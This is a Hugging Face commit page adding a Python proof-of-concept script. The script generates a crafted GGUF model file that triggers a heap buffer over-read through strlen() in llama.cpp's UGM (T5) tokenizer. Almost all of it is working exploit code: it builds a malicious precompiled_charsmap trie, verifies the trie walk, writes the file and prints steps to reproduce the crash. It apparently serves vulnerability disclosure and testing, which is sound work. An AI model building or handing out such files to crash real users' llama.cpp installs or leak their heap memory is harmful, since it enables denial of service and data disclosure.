salvepilo
/

llama-cpp-strlen-oob-poc

GGUF

Model card Files Files and versions

xet

Community

salvepilo commited on Feb 17

Commit

2e555e8

verified ·

1 Parent(s): 30982be

Upload poc_strlen_oob.py with huggingface_hub

Browse files

Files changed (1) hide show

poc_strlen_oob.py +571 -0

poc_strlen_oob.py ADDED Viewed

	@@ -0,0 +1,571 @@

+#!/usr/bin/env python3
+"""
+PoC: Heap buffer over-read via strlen() on unterminated precompiled_charsmap
+in llama.cpp's UGM (T5) tokenizer.
+Vulnerability location:
+  src/llama-vocab.cpp, function normalize_prefix(), around line 1128-1129:
+    const char * prefix_replacement = &(tokenizer.prefix_replacements)[longest_prefix_offset];
+    return { prefix_replacement, strlen(prefix_replacement), longest_prefix_length };
+The precompiled_charsmap is loaded from GGUF metadata at lines 1823-1825 without
+any validation that replacement strings are null-terminated.  When the XCDA trie
+matches an input prefix and yields a replacement-string offset that points to data
+near the end of the buffer with no trailing NUL byte, strlen() reads past the end
+of the heap allocation.
+Exploit path:
+  1. A GGUF file sets tokenizer.ggml.model = "t5" to select the UGM tokenizer.
+  2. tokenizer.ggml.precompiled_charsmap contains a crafted binary blob:
+       [4 bytes: xcda_blob_size (uint32 LE)]
+       [xcda_blob_size bytes: XCDA trie entries (uint32 LE each)]
+       [remaining bytes: prefix_replacements string table]
+  3. The XCDA trie is constructed so that the ASCII character 'A' (0x41) matches
+     a single-character prefix whose replacement-string offset points to the very
+     last byte of the prefix_replacements region -- a byte that is NOT followed by
+     a NUL terminator.
+  4. When the model tokenizes any text containing 'A', normalize_prefix() walks
+     the XCDA, finds the match, passes the bounds check (offset < size), then
+     calls strlen() which reads past the buffer boundary.
+XCDA bit-packing (per uint32_t entry):
+  bits 10-30: BASE value (21 bits)
+  bit  9:     BASE shift flag (if set, BASE is shifted left by 8)
+  bit  8:     LEAF flag
+  bits 0-7:   LCHECK value
+  For value nodes (referenced when LEAF=1):
+    bits 0-30: replacement string offset into prefix_replacements
+    bit  31:   (flag, masked out by get_value)
+Trie walk for input character c:
+  node_index  = get_base(root)       # start from root
+  node_index ^= c                    # XOR with character value
+  check get_lcheck(node_index) == c  # verify parentage
+  is_leaf = get_leaf(node_index)
+  node_index ^= get_base(node_index) # descend
+  if is_leaf:
+      offset = get_value(node_index) # read replacement offset
+This PoC constructs a minimal GGUF file that triggers the bug when loaded
+with vocab_only=true and any text containing 'A' is tokenized.
+Usage:
+  python3 poc_strlen_oob.py               # generates poc_strlen_oob.gguf
+  # Then in llama.cpp build directory:
+  # ./bin/llama-cli -m poc_strlen_oob.gguf --vocab-only -p "A" 2>&1
+  # (will crash or ASAN will report heap-buffer-overflow)
+"""
+import struct
+import os
+import sys
+# --------------------------------------------------------------------------- #
+#  GGUF binary format constants
+# --------------------------------------------------------------------------- #
+GGUF_MAGIC   = 0x46554747  # "GGUF" in little-endian
+GGUF_VERSION = 3
+# GGUFValueType enum
+GGUF_TYPE_UINT8   = 0
+GGUF_TYPE_INT8    = 1
+GGUF_TYPE_UINT16  = 2
+GGUF_TYPE_INT16   = 3
+GGUF_TYPE_UINT32  = 4
+GGUF_TYPE_INT32   = 5
+GGUF_TYPE_FLOAT32 = 6
+GGUF_TYPE_BOOL    = 7
+GGUF_TYPE_STRING  = 8
+GGUF_TYPE_ARRAY   = 9
+GGUF_TYPE_UINT64  = 10
+GGUF_TYPE_INT64   = 11
+GGUF_TYPE_FLOAT64 = 12
+# GGML quantization types
+GGML_TYPE_F32 = 0
+ALIGNMENT = 32
+def pack_string(s: str) -> bytes:
+    """Pack a GGUF string value: uint64 length + raw UTF-8 bytes."""
+    encoded = s.encode("utf-8")
+    return struct.pack("<Q", len(encoded)) + encoded
+def pack_kv_string(key: str, value: str) -> bytes:
+    """Pack a complete KV pair with string value."""
+    return pack_string(key) + struct.pack("<I", GGUF_TYPE_STRING) + pack_string(value)
+def pack_kv_uint32(key: str, value: int) -> bytes:
+    """Pack a complete KV pair with uint32 value."""
+    return pack_string(key) + struct.pack("<I", GGUF_TYPE_UINT32) + struct.pack("<I", value)
+def pack_kv_float32(key: str, value: float) -> bytes:
+    """Pack a complete KV pair with float32 value."""
+    return pack_string(key) + struct.pack("<I", GGUF_TYPE_FLOAT32) + struct.pack("<f", value)
+def pack_kv_int8_array(key: str, data: bytes) -> bytes:
+    """Pack a complete KV pair with an array of int8 (used for precompiled_charsmap)."""
+    result = pack_string(key)
+    result += struct.pack("<I", GGUF_TYPE_ARRAY)     # value type = ARRAY
+    result += struct.pack("<I", GGUF_TYPE_UINT8)     # array element type = UINT8
+    result += struct.pack("<Q", len(data))           # array length
+    result += data                                    # raw bytes
+    return result
+def pack_kv_string_array(key: str, strings: list) -> bytes:
+    """Pack a complete KV pair with an array of strings."""
+    result = pack_string(key)
+    result += struct.pack("<I", GGUF_TYPE_ARRAY)
+    result += struct.pack("<I", GGUF_TYPE_STRING)
+    result += struct.pack("<Q", len(strings))
+    for s in strings:
+        result += pack_string(s)
+    return result
+def pack_kv_float32_array(key: str, values: list) -> bytes:
+    """Pack a complete KV pair with an array of float32."""
+    result = pack_string(key)
+    result += struct.pack("<I", GGUF_TYPE_ARRAY)
+    result += struct.pack("<I", GGUF_TYPE_FLOAT32)
+    result += struct.pack("<Q", len(values))
+    for v in values:
+        result += struct.pack("<f", v)
+    return result
+def pack_kv_int32_array(key: str, values: list) -> bytes:
+    """Pack a complete KV pair with an array of int32."""
+    result = pack_string(key)
+    result += struct.pack("<I", GGUF_TYPE_ARRAY)
+    result += struct.pack("<I", GGUF_TYPE_INT32)
+    result += struct.pack("<Q", len(values))
+    for v in values:
+        result += struct.pack("<i", v)
+    return result
+# --------------------------------------------------------------------------- #
+#  XCDA trie construction helpers
+# --------------------------------------------------------------------------- #
+def pack_xcda_node(base: int, lcheck: int, leaf: bool, base_shift: bool = False) -> int:
+    """
+    Pack an XCDA node into a uint32.
+    Layout:
+      bits 10-30: BASE (21 bits, before optional shift)
+      bit  9:     shift flag (if 1, actual BASE = stored_base << 8)
+      bit  8:     LEAF flag
+      bits 0-7:   LCHECK
+    When base_shift=False: stored_base = base, actual = stored_base << 0
+    When base_shift=True:  stored_base = base >> 8, actual = stored_base << 8
+    """
+    assert 0 <= lcheck <= 0xFF
+    assert 0 <= base <= 0x1FFFFF  # 21 bits max for stored base
+    packed = 0
+    if base_shift:
+        stored_base = base >> 8
+        packed |= (stored_base & 0x1FFFFF) << 10
+        packed |= (1 << 9)  # shift flag
+    else:
+        packed |= (base & 0x1FFFFF) << 10
+        # bit 9 = 0 (no shift)
+    if leaf:
+        packed |= (1 << 8)
+    packed |= (lcheck & 0xFF)
+    return packed
+def pack_xcda_value_node(offset: int) -> int:
+    """
+    Pack a value node. get_value() returns packed & 0x7FFFFFFF.
+    The offset is the index into prefix_replacements.
+    """
+    assert 0 <= offset <= 0x7FFFFFFF
+    return offset
+# --------------------------------------------------------------------------- #
+#  Build the malicious precompiled_charsmap
+# --------------------------------------------------------------------------- #
+def build_malicious_charsmap() -> bytes:
+    """
+    Build a precompiled_charsmap blob that triggers OOB read via strlen().
+    The XCDA trie matches the single ASCII character 'A' (0x41) and returns
+    a replacement string offset pointing to the last byte of the
+    prefix_replacements section, which has NO null terminator.
+    IMPORTANT: During model loading, llama.cpp tokenizes "\\n" to determine
+    the newline token ID (line 2180 of llama-vocab.cpp). This means the XCDA
+    trie is walked for character 0x0A during init. We must ensure the array
+    is large enough that BASE_root ^ c doesn't go out of bounds for ANY
+    single-byte character. We use BASE_root = 0, so the child index for
+    character c is simply c. The array needs 256 entries to be safe.
+    XCDA array layout (256 entries):
+      [0]   Root node:     BASE=0, LCHECK=0, LEAF=0
+      [0x41] Child for 'A': LCHECK=0x41, LEAF=1, BASE=3
+             After XOR: node_index = 0x41 ^ 3 = 0x42
+      [0x42] Value node:   offset pointing to last byte of prefix_replacements
+      All other entries:    0 (LCHECK=0, won't match any non-zero char)
+    Trie walk for input 'A' (c=0x41):
+      1. node_index = get_base(0) = 0
+      2. node_index ^= 0x41 => 0x41
+      3. get_lcheck(0x41) = 0x41 => matches!
+      4. get_leaf(0x41) = true
+      5. node_index ^= get_base(0x41) => 0x41 ^ 3 = 0x42
+      6. get_value(0x42) = replacement_offset => points to unterminated data
+    Trie walk for any other char c (e.g. '\\n' = 0x0A):
+      1. node_index = get_base(0) = 0
+      2. node_index ^= c => c
+      3. get_lcheck(c) = 0 (entry is all zeros) => 0 != c => break
+      => No match, falls through to UTF-8 passthrough. Safe.
+    prefix_replacements: non-NUL bytes with NO trailing NUL terminator.
+    """
+    # Build XCDA array: 256 entries, all zeros except the ones we need
+    NUM_ENTRIES = 256
+    xcda = [0] * NUM_ENTRIES
+    # Root (index 0): BASE=0, LEAF=0, LCHECK=0
+    # With BASE=0, for character c, node_index = 0 ^ c = c
+    # So the child for 'A' (0x41) is at index 0x41
+    xcda[0] = pack_xcda_node(base=0, lcheck=0x00, leaf=False)
+    # Child for 'A' at index 0x41:
+    #   LCHECK=0x41 (must match character)
+    #   LEAF=1 (this completes a match)
+    #   BASE=3 (after XOR: 0x41 ^ 3 = 0x42, the value node)
+    xcda[0x41] = pack_xcda_node(base=3, lcheck=0x41, leaf=True)
+    # Value node at index 0x42:
+    #   get_value() returns packed & 0x7FFFFFFF = the replacement offset
+    #   We point to the last byte of prefix_replacements (no NUL follows).
+    replacement_offset = 7
+    xcda[0x42] = pack_xcda_value_node(replacement_offset)
+    # Pack all entries
+    xcda_entries = struct.pack("<" + "I" * NUM_ENTRIES, *xcda)
+    xcda_blob_size = len(xcda_entries)  # 256 * 4 = 1024 bytes
+    # prefix_replacements: 8 bytes of non-NUL data, NO null terminator
+    # The replacement offset (7) points to the 8th byte (index 7).
+    # strlen() starts there, finds 'B' (0x42), then reads PAST the buffer
+    # looking for a NUL that doesn't exist.
+    prefix_replacements = b"\x42" * 8  # 'B' * 8, no NUL
+    # Full charsmap: [uint32 xcda_blob_size] [xcda_entries] [prefix_replacements]
+    charsmap = struct.pack("<I", xcda_blob_size) + xcda_entries + prefix_replacements
+    return charsmap
+# --------------------------------------------------------------------------- #
+#  Verify the trie walk in Python (sanity check)
+# --------------------------------------------------------------------------- #
+def verify_trie_walk(charsmap: bytes):
+    """Simulate the C++ trie walk to verify our XCDA is correct."""
+    # Parse charsmap
+    xcda_blob_size = struct.unpack_from("<I", charsmap, 0)[0]
+    charsmap_offset = 4
+    xcda_array = []
+    for i in range(xcda_blob_size // 4):
+        val = struct.unpack_from("<I", charsmap, charsmap_offset + i * 4)[0]
+        xcda_array.append(val)
+    prefix_replacements_offset = 4 + xcda_blob_size
+    prefix_replacements_size = len(charsmap) - prefix_replacements_offset
+    prefix_replacements = charsmap[prefix_replacements_offset:]
+    print(f"[*] Charsmap total size: {len(charsmap)} bytes")
+    print(f"[*] XCDA blob size: {xcda_blob_size} bytes ({xcda_blob_size // 4} entries)")
+    non_zero = {i: x for i, x in enumerate(xcda_array) if x != 0}
+    print(f"[*] XCDA non-zero entries: { {i: '0x%08X' % x for i, x in non_zero.items()} }")
+    print(f"[*] prefix_replacements size: {prefix_replacements_size} bytes")
+    print(f"[*] prefix_replacements (hex): {prefix_replacements.hex()}")
+    print(f"[*] prefix_replacements contains NUL: {0 in prefix_replacements}")
+    print()
+    def get_base(index):
+        packed = xcda_array[index]
+        return (packed >> 10) << ((packed & (1 << 9)) >> 6)
+    def get_lcheck(index):
+        packed = xcda_array[index]
+        return packed & ((1 << 31) | 0xFF)
+    def get_leaf(index):
+        packed = xcda_array[index]
+        return bool((packed >> 8) & 1)
+    def get_value(index):
+        packed = xcda_array[index]
+        return packed & ((1 << 31) - 1)
+    # Simulate walk for character 'A' (0x41)
+    input_char = ord('A')
+    print(f"[*] Simulating trie walk for character 'A' (0x{input_char:02X})...")
+    node_index = 0
+    base_root = get_base(node_index)
+    print(f"    Root node[0] packed=0x{xcda_array[0]:08X}, get_base(0)={base_root}")
+    node_index = base_root
+    c = input_char
+    node_index ^= c
+    print(f"    node_index ^= 0x{c:02X} => node_index = {node_index}")
+    lcheck = get_lcheck(node_index)
+    print(f"    node[{node_index}] packed=0x{xcda_array[node_index]:08X}")
+    print(f"    get_lcheck({node_index}) = 0x{lcheck:08X}")
+    if lcheck != c:
+        print(f"    [!] LCHECK mismatch: 0x{lcheck:X} != 0x{c:X}")
+        return False
+    print(f"    LCHECK matches: 0x{lcheck:X} == 0x{c:X}")
+    is_leaf = get_leaf(node_index)
+    print(f"    get_leaf({node_index}) = {is_leaf}")
+    base_child = get_base(node_index)
+    node_index ^= base_child
+    print(f"    get_base({node_index ^ base_child}) = {base_child}")
+    print(f"    node_index ^= {base_child} => node_index = {node_index}")
+    if is_leaf:
+        value = get_value(node_index)
+        print(f"    node[{node_index}] packed=0x{xcda_array[node_index]:08X}")
+        print(f"    get_value({node_index}) = {value}")
+        print(f"    => longest_prefix_offset = {value}")
+        print(f"    => Bounds check: {value} < {prefix_replacements_size} = {value < prefix_replacements_size}")
+        print(f"    => String at offset {value}: {prefix_replacements[value:]!r}")
+        print(f"    => Contains NUL after offset: {0 in prefix_replacements[value:]}")
+        if value < prefix_replacements_size and 0 not in prefix_replacements[value:]:
+            print()
+            print(f"    [!] VULNERABILITY CONFIRMED: strlen() will read past buffer!")
+            print(f"    [!] prefix_replacement points to byte {value} of {prefix_replacements_size}")
+            print(f"    [!] No NUL terminator exists -- strlen() causes heap over-read")
+            return True
+        else:
+            print(f"    [-] No vulnerability (null terminator present or offset OOB)")
+            return False
+    else:
+        print(f"    [-] Not a leaf node, no match")
+        return False
+# --------------------------------------------------------------------------- #
+#  Build the minimal GGUF file
+# --------------------------------------------------------------------------- #
+def build_gguf(charsmap: bytes, output_path: str):
+    """
+    Build a minimal GGUF file that:
+      - Sets architecture to "t5" (to trigger UGM tokenizer path)
+      - Provides the malicious precompiled_charsmap
+      - Includes minimal token vocabulary (pad, eos, unk + a normal token)
+      - Can be loaded with vocab_only=true (no tensors needed)
+    """
+    # ---- KV metadata ----
+    kv_pairs = bytearray()
+    # general.architecture = "t5"
+    # (Required: determines the model architecture for key formatting)
+    kv_pairs += pack_kv_string("general.architecture", "t5")
+    # tokenizer.ggml.model = "t5" (triggers LLAMA_VOCAB_TYPE_UGM)
+    kv_pairs += pack_kv_string("tokenizer.ggml.model", "t5")
+    # Token list: need at least 3 tokens for special token IDs:
+    #   0 = pad, 1 = eos, 2 = unk
+    # Plus some normal tokens for the tokenizer to work.
+    # The UGM tokenizer needs at least one normal token to avoid issues.
+    tokens = [
+        "<pad>",           # 0 - pad token
+        "</s>",            # 1 - eos token
+        "<unk>",           # 2 - unk token
+        "\xe2\x96\x81A",  # 3 - normal token: escaped_space + "A"
+        "\xe2\x96\x81B",  # 4 - normal token: escaped_space + "B"
+        "A",               # 5 - normal token: bare "A"
+        "B",               # 6 - normal token: bare "B"
+    ]
+    kv_pairs += pack_kv_string_array("tokenizer.ggml.tokens", tokens)
+    # Token scores (float32 array, same length as tokens)
+    scores = [0.0, 0.0, 0.0, -1.0, -1.0, -2.0, -2.0]
+    kv_pairs += pack_kv_float32_array("tokenizer.ggml.scores", scores)
+    # Token types (int32 array):
+    #   1 = NORMAL, 2 = UNKNOWN, 3 = CONTROL, 4 = USER_DEFINED, 5 = UNUSED, 6 = BYTE
+    token_types = [
+        3,  # pad - CONTROL
+        3,  # eos - CONTROL
+        2,  # unk - UNKNOWN
+        1,  # normal
+        1,  # normal
+        1,  # normal
+        1,  # normal
+    ]
+    kv_pairs += pack_kv_int32_array("tokenizer.ggml.token_type", token_types)
+    # EOS token ID
+    kv_pairs += pack_kv_uint32("tokenizer.ggml.eos_token_id", 1)
+    # UNK token ID
+    kv_pairs += pack_kv_uint32("tokenizer.ggml.unknown_token_id", 2)
+    # Padding token ID
+    kv_pairs += pack_kv_uint32("tokenizer.ggml.padding_token_id", 0)
+    # The malicious precompiled_charsmap
+    kv_pairs += pack_kv_int8_array("tokenizer.ggml.precompiled_charsmap", charsmap)
+    n_kv = 9  # count of KV pairs above
+    # ---- Tensor info ----
+    # vocab_only mode: no tensors needed.
+    n_tensors = 0
+    # ---- Write GGUF file ----
+    with open(output_path, "wb") as f:
+        # Header
+        f.write(struct.pack("<I", GGUF_MAGIC))     # magic
+        f.write(struct.pack("<I", GGUF_VERSION))    # version
+        f.write(struct.pack("<Q", n_tensors))       # tensor count
+        f.write(struct.pack("<Q", n_kv))            # kv count
+        # KV data
+        f.write(kv_pairs)
+        # No tensor info, no tensor data
+    file_size = os.path.getsize(output_path)
+    print(f"[+] Written GGUF file: {output_path} ({file_size} bytes)")
+# --------------------------------------------------------------------------- #
+#  Main
+# --------------------------------------------------------------------------- #
+def main():
+    print("=" * 72)
+    print("PoC: Heap buffer over-read via strlen() on unterminated")
+    print("     precompiled_charsmap in llama.cpp UGM tokenizer")
+    print("=" * 72)
+    print()
+    print("Vulnerability: src/llama-vocab.cpp, normalize_prefix()")
+    print("  Line ~1128-1129:")
+    print('    const char * prefix_replacement = ')
+    print('        &(tokenizer.prefix_replacements)[longest_prefix_offset];')
+    print('    return { prefix_replacement, strlen(prefix_replacement), ')
+    print('             longest_prefix_length };')
+    print()
+    print("The precompiled_charsmap blob is loaded from GGUF metadata without")
+    print("validating that replacement strings are null-terminated. If the XCDA")
+    print("trie matches an input prefix and returns an offset pointing to data")
+    print("near the buffer end with no NUL byte, strlen() reads past the heap")
+    print("allocation boundary.")
+    print()
+    # Step 1: Build the malicious charsmap
+    print("-" * 72)
+    print("Step 1: Building malicious precompiled_charsmap")
+    print("-" * 72)
+    charsmap = build_malicious_charsmap()
+    # Step 2: Verify the trie walk
+    print()
+    print("-" * 72)
+    print("Step 2: Verifying XCDA trie walk (Python simulation)")
+    print("-" * 72)
+    print()
+    vuln_confirmed = verify_trie_walk(charsmap)
+    print()
+    if not vuln_confirmed:
+        print("[!] Trie verification failed. Aborting.")
+        sys.exit(1)
+    # Step 3: Build the GGUF file
+    print("-" * 72)
+    print("Step 3: Building malicious GGUF file")
+    print("-" * 72)
+    output_dir = os.path.dirname(os.path.abspath(__file__))
+    output_path = os.path.join(output_dir, "poc_strlen_oob.gguf")
+    build_gguf(charsmap, output_path)
+    # Step 4: Print reproduction instructions
+    print()
+    print("-" * 72)
+    print("Step 4: Reproduction")
+    print("-" * 72)
+    print()
+    print("To trigger the vulnerability, load the GGUF file and tokenize any")
+    print("text containing 'A'. The XCDA trie will match 'A' and return a")
+    print("replacement-string offset pointing to the last byte of the")
+    print("prefix_replacements buffer which has no null terminator.")
+    print()
+    print("With AddressSanitizer (ASAN):")
+    print()
+    print(f"  # Build llama.cpp with ASAN:")
+    print(f"  cmake -B build -DLLAMA_SANITIZE_ADDRESS=ON")
+    print(f"  cmake --build build")
+    print(f"")
+    print(f"  # Trigger with the simple tokenize tool:")
+    print(f"  ./build/bin/llama-cli \\")
+    print(f"      -m {output_path} \\")
+    print(f"      --vocab-only \\")
+    print(f"      -p \"Hello A world\"")
+    print()
+    print("Expected ASAN output:")
+    print("  ==PID==ERROR: AddressSanitizer: heap-buffer-overflow")
+    print("  READ of size N at 0xADDR")
+    print("  #0 strlen")
+    print("  #1 llm_tokenizer_ugm_session::normalize_prefix()")
+    print()
+    print("Without ASAN, the over-read may:")
+    print("  - Silently leak heap data into replacement strings")
+    print("  - Cause a segfault if the read crosses a page boundary")
+    print("  - Produce garbled tokenization output")
+    print()
+    print("Alternatively, use a simple C program to load vocab_only and tokenize:")
+    print()
+    print("  // trigger.c")
+    print("  #include \"llama.h\"")
+    print("  int main() {")
+    print("      llama_backend_init();")
+    print("      struct llama_model_params mp = llama_model_default_params();")
+    print("      mp.vocab_only = true;")
+    print(f'      struct llama_model * m = llama_model_load_from_file("{output_path}", mp);')
+    print("      const struct llama_vocab * v = llama_model_get_vocab(m);")
+    print("      llama_token tokens[64];")
+    print('      int n = llama_tokenize(v, "A", 1, tokens, 64, false, true);')
+    print("      llama_model_free(m);")
+    print("      llama_backend_free();")
+    print("  }")
+    print()
+    print("=" * 72)
+    print("PoC generation complete.")
+    print("=" * 72)
+if __name__ == "__main__":
+    main()